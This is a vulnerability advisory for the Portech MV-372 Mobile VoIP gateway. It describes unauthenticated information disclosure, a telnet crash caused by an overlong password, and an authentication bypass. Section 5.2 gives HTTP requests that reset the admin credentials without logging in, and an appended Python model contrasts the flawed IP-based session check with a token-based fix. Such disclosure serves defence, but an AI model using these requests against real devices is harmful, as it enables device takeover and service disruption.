Portech MV-372 Mobile VoIP Multiple Vulnerabilities

1. Description

Multiple vulnerabilities have been found in the Portech MV-372 Mobile VoIP Gateway which allow an attacker to compromise the device and/or initiate a denial of service attack against its telnet service. The "Device details" section contains information about the affected system. Previous and future versions might also be vulnerable (not tested). The vendor has been notified and is aware of the issue, but from their reply it seems we will have to wait a while for a hotfix/patch.

2. Device details

Mobile VoIP2 v9.092
Model Type: MV-372
Module Description: GSM:850/900/1800/1900MHz (SIM3x0)
Firmware Version: Mon Sep 6 13:11:30 2010.
Codec Version: Fri Mar 20 17:13:45 2009.
Contact Address: 150, Shiang-Shung N.Road., Taichung, Taiwan, R.O.C.
Tel: 886-4-23058000
Fax: 886-4-23022596
E-Mail: sales@portech.com.tw
Web Site: http://www.portech.com.tw.

3. Information disclosure

It is possible to access http://<device address>/info.htm without authentication. This page reveals information about the device such as model type, module description, and firmware and codec versions.

4. Telnet service remote denial of service vulnerability

It is possible to initiate a denial of service attack against the telnet service without authentication by providing a very long password (e.g. > 5000 chars) at authentication. No valid username is required. As a result of the attack the telnet service crashes and remains unavailable until the device is restarted.

5. Web Administration authentication bypass vulnerability

5.1 Description

An authentication bypass vulnerability exists in the web interface which allows an attacker to modify the configuration of the device without providing a valid username and password. After a successful authentication we can see that our browser received no cookie(s) from the device. After restarting the browser, deleting all stored information or using private browsing we can still access the administrative pages. When we change our IP address these pages are no longer accessible and we are asked to log in. So, the device stores our IP address and uses it as a session identifier. This is a weakness: just as the application uses HTTP instead of HTTPS for authentication, it also fails to properly validate the user session. The files with ".htm" extension are responsible for user interaction and for displaying configuration settings, and the application uses CGI to handle the requested tasks such as configuration, username and password changes. While the ".htm" pages verify our IP address, the CGI files do not, so calling these files directly with the proper arguments results in the execution of the requested action without any authentication.

5.2 Proof of concept

To change the username and password of the device without authentication, send the following query to the device:

POST http://<device address>/change.cgi HTTP/1.1
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit

The query above changes the current username and password both to admin. To apply the changes we have to save the configuration, which can be done with the query below. After executing the query the device restarts and we can log in with the username "admin" and password "admin".

POST http://<device address>/save.cgi
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

submit=Save

All other CGIs are also vulnerable.

Regards,
Zsolt Imre
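The authorization flaw described in section 5.1, modelled as an added Python example that is not the device's firmware or the advisory author's code: the IP-keyed check applied only to .htm pages, beside a hardened form that issues a random session token at login and checks it in one gate before any handler, .htm or .cgi alike. Handler paths mirror the advisory; the credentials and client addresses are constructed sample values.

```python
import secrets

# Constructed sample credentials for the model; not the device's defaults.
VALID_CREDENTIALS = ("operator", "s3cret-sample")


class IpSessionDevice:
    """Vulnerable pattern from section 5.1: the client IP is the session
    identifier, only the .htm pages consult it, and .cgi handlers never do."""

    def __init__(self):
        self.authenticated_ips = set()
        self.credentials = VALID_CREDENTIALS

    def login(self, client_ip, user, password):
        if (user, password) == self.credentials:
            self.authenticated_ips.add(client_ip)
            return 200, None            # no cookie is ever issued
        return 401, None

    def request(self, client_ip, path, form=None, token=None):
        if path.endswith(".htm"):       # pages check the IP only
            return 200 if client_ip in self.authenticated_ips else 401
        if path == "/change.cgi":       # CGI runs with no check at all
            self.credentials = (form["Nuser"], form["Npass"])
            return 200
        return 404


class TokenSessionDevice(IpSessionDevice):
    """Hardened form: an unguessable token (sent as a Secure, HttpOnly cookie
    over HTTPS) is issued at login and verified centrally for every path."""

    def __init__(self):
        super().__init__()
        self.sessions = set()

    def login(self, client_ip, user, password):
        if (user, password) != self.credentials:
            return 401, None
        token = secrets.token_urlsafe(32)
        self.sessions.add(token)
        return 200, token

    def request(self, client_ip, path, form=None, token=None):
        # One gate, before dispatch: no handler is reachable without a session.
        if token is None or not any(secrets.compare_digest(token, t)
                                    for t in self.sessions):
            return 401
        if path.endswith(".htm"):
            return 200
        if path == "/change.cgi":
            self.credentials = (form["Nuser"], form["Npass"])
            return 200
        return 404
```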